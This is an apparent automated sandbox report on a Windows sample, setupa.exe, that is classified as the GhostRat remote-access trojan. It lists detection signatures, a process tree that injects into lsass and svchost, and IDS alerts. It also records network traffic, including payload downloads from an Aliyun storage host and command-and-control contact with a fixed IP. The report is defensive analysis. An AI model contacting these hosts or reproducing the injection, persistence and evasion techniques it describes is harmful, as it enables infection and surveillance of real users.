

Windows Analysis Report
setupa.exe

Overview

General Information

Sample name: setupa.exe
Analysis ID: 1527612
MD5: 60caff11e037bac89bdb4dd789d65fd7
SHA1: 2cd1508b227be4d1dbcde6a5bbe06209d52450ec
SHA256: 0b9fc8ca80e9d9571057feb6302b07eb48aa7d5e587a16b13bec21a05e44696f
Tags: exe, SliverFox, user-bloated7731

Detection

GhostRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected GhostRat
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates files in the system32 config directory
Injects a PE file into a foreign process
Installs new ROOT certificates
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • setupa.exe (PID: 4768 cmdline: "C:\Users\user\Desktop\setupa.exe" MD5: 60CAFF11E037BAC89BDB4DD789D65FD7)
    • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • dllhost.exe (PID: 1308 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • svchost.exe (PID: 6188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2440 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • upupoo-classicshell.exe (PID: 1308 cmdline: "C:\Users\Public\Documents\upupoo-classicshell.exe" MD5: 606CDA46E88CE86AE85AC92B2B560D0A)
        • svchost.exe (PID: 3636 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • upupoo-classicshell.exe (PID: 5696 cmdline: "C:\Program Files\upupoo-classicshell.exe" MD5: 606CDA46E88CE86AE85AC92B2B560D0A)
      • svchost.exe (PID: 5740 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 3148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara hits in memory dumps (5 of 28 entries shown):

Source | Rule | Description | Author | Strings
00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

Yara hits in unpacked PE files (5 of 55 entries shown):

Source | Rule | Description | Author | Strings
4.3.svchost.exe.4553003.5.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
12.3.svchost.exe.2c6c05b.1.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
4.3.svchost.exe.28a305b.6.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
4.3.svchost.exe.28a305b.8.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
4.3.svchost.exe.4453003.0.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

System Summary

Sigma rule matches:

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Documents\upupoo-classicshell.exe" , CommandLine: "C:\Users\Public\Documents\upupoo-classicshell.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\upupoo-classicshell.exe, NewProcessName: C:\Users\Public\Documents\upupoo-classicshell.exe, OriginalFileName: C:\Users\Public\Documents\upupoo-classicshell.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Users\Public\Documents\upupoo-classicshell.exe" , ProcessId: 1308, ProcessName: upupoo-classicshell.exe
Source: Process started; Author: David Burkett, @signalblur; Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files\upupoo-classicshell.exe" , ParentImage: C:\Program Files\upupoo-classicshell.exe, ParentProcessId: 5696, ParentProcessName: upupoo-classicshell.exe, ProcessCommandLine: svchost.exe, ProcessId: 5740, ProcessName: svchost.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 47.239.116.158, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 5740, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49998
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files\upupoo-classicshell.exe" , ParentImage: C:\Program Files\upupoo-classicshell.exe, ParentProcessId: 5696, ParentProcessName: upupoo-classicshell.exe, ProcessCommandLine: svchost.exe, ProcessId: 5740, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Documents\upupoo-classicshell.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files\upupoo-classicshell.exe, ProcessId: 5696, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WINWORD2013
Source: Process started; Author: vburov; Data: Command: C:\Windows\system32\lsass.exe, CommandLine: C:\Windows\system32\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: "C:\Users\user\Desktop\setupa.exe", ParentImage: C:\Users\user\Desktop\setupa.exe, ParentProcessId: 4768, ParentProcessName: setupa.exe, ProcessCommandLine: C:\Windows\system32\lsass.exe, ProcessId: 640, ProcessName: lsass.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T06:39:13.355916+0200 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:40:14.725647+0200 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:39:08.962828+0200 | 2052262 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 47.239.116.158 | 6666 | TCP
2024-10-07T06:39:17.979812+0200 | 2052262 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 47.239.116.158 | 6666 | TCP


AV Detection

Source: setupa.exe; Virustotal: Detection: 11%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.2% probability
Source: C:\Users\user\Desktop\setupa.exe; Directory created: C:\Program Files\ClassicStartMenuDLL.dll
Source: C:\Users\user\Desktop\setupa.exe; Directory created: C:\Program Files\upup.ox
Source: C:\Users\user\Desktop\setupa.exe; Directory created: C:\Program Files\upupoo-classicshell.exe
Source: unknown; HTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 47.79.64.157:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: setupa.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \KinndigitDll\x64\Release\KinndigitDll.pdb; source: setupa.exe, 00000000.00000003.2200525100.000001F5DCBB6000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, lsass.exe, 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091116393.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: c:\Users\Sware\Desktop\classic-shell\Classic-Shell-4.3.1\ClassicShellSrc\ClassicStartMenu\Setup\ClassicStartMenu.pdb; source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000000.2254604894.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe.0.dr
Source: C:\Windows\SysWOW64\svchost.exe; File opened: z:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: x:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: v:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: t:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: r:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: p:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: n:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: l:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: j:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: h:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: f:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: b:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: y:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: w:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: u:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: s:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: q:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: o:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: m:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: k:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: i:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: g:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: e:
Source: C:\Users\user\Desktop\setupa.exe; File opened: c:
Source: C:\Windows\SysWOW64\svchost.exe; File opened: [:
Source: C:\Windows\System32\lsass.exe; Code function: 1_2_00000140ADFD2188 FindFirstFileExW,1_2_00000140ADFD2188
Source: C:\Windows\System32\lsass.exe; Code function: 1_2_00000140ADFC8F84 FindFirstFileExW,1_2_00000140ADFC8F84
Source: C:\Program Files\upupoo-classicshell.exe; Code function: 3_2_00C22BE0 ?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,_wcschr,_wcschr,FindFirstFileW,FindClose,3_2_00C22BE0
Source: C:\Users\user\Desktop\setupa.exe; Code function: 0_2_00007FF689642CDE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetComputerNameA,GetSystemInfo,GetLogicalDriveStringsA,GlobalMemoryStatusEx,FreeLibrary,FreeLibrary,GetAdaptersInfo,GetAdaptersInfo,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00007FF689642CDE

Networking

Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49709 -> 47.239.116.158:6666
Source: Network traffic; Suricata IDS: 2052262 - Severity 1 - ET MALWARE Win32/ProcessKiller CnC Initialization M1 : 192.168.2.5:49707 -> 47.239.116.158:6666
Source: Network traffic; Suricata IDS: 2052262 - Severity 1 - ET MALWARE Win32/ProcessKiller CnC Initialization M1 : 192.168.2.5:49739 -> 47.239.116.158:6666
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49728 -> 47.239.116.158:6666
Source: C:\Windows\SysWOW64\svchost.exe; Network Connect: 47.239.116.158 6666
Source: global traffic; TCP traffic: 192.168.2.5:49707 -> 47.239.116.158:6666
Source: Joe Sandbox View; ASN Name: CHARTER-20115US
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown; TCP traffic detected without corresponding DNS query: 47.239.116.158 (this entry is repeated 50 times in the report)
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4_2_02583330 recv,timeGetTime,_memmove,4_2_02583330
Source: global traffic; HTTP traffic detected:
    GET /ClassicStartMenuDLL.dll HTTP/1.1
    Connection: Keep-Alive
    User-Agent: SecureWinHTTP/1.0
    Host: kehu8.oss-cn-hongkong.aliyuncs.com
Source: global traffic; HTTP traffic detected:
    GET /upup.ox HTTP/1.1
    Connection: Keep-Alive
    User-Agent: SecureWinHTTP/1.0
    Host: kehu8.oss-cn-hongkong.aliyuncs.com
Source: global traffic; HTTP traffic detected:
    GET /upupoo-classicshell.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: SecureWinHTTP/1.0
    Host: kehu8.oss-cn-hongkong.aliyuncs.com
Source: global traffic; DNS traffic detected: DNS query: kehu8.oss-cn-hongkong.aliyuncs.com
Source: lsass.exe, 00000001.00000002.3350014220.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://3csp.icrosof4m/ocp0
Source: svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350136674.000002D754513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2316259625.000002D75457F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/STS
Source: svchost.exe, 00000008.00000002.3350658881.000002D754579000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJD
Source: svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
Source: svchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350920486.000002D75457F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb
Source: svchost.exe, 00000008.00000002.3352993743.000002D754CB0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3347254806.000002D753EA0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tbA
Source: svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://Passport.NET/tb_
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: upupoo-classicshell.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA.crt0
Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091170330.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3349368569.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091205038.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000001.00000003.2221645884.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000003.2258013428.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3351186509.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: svchost.exe, 00000008.00000002.3348244944.000002D753EDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3363402606.000001428B127000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091170330.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3349368569.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091205038.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000001.00000003.2221645884.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000003.2258013428.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3351186509.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigning-g1.crl03
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: lsass.exe, 00000001.00000003.2253656839.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3349368569.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091205038.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3350706270.00000140AE19A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: lsass.exe, 00000001.00000003.2221645884.00000140AD8C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: lsass.exe, 00000001.00000002.3350918851.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000003.2258013428.00000140AE1B6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091332038.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3351186509.00000140AE1B7000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091441286.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: upupoo-classicshell.exe.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigning-g1.crl0K
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: svchost.exe, 00000009.00000002.3362326079.000001428A8D2000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.2865869717.000001428A8D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: lsass.exe, 00000001.00000000.2090575824.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3347128384.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
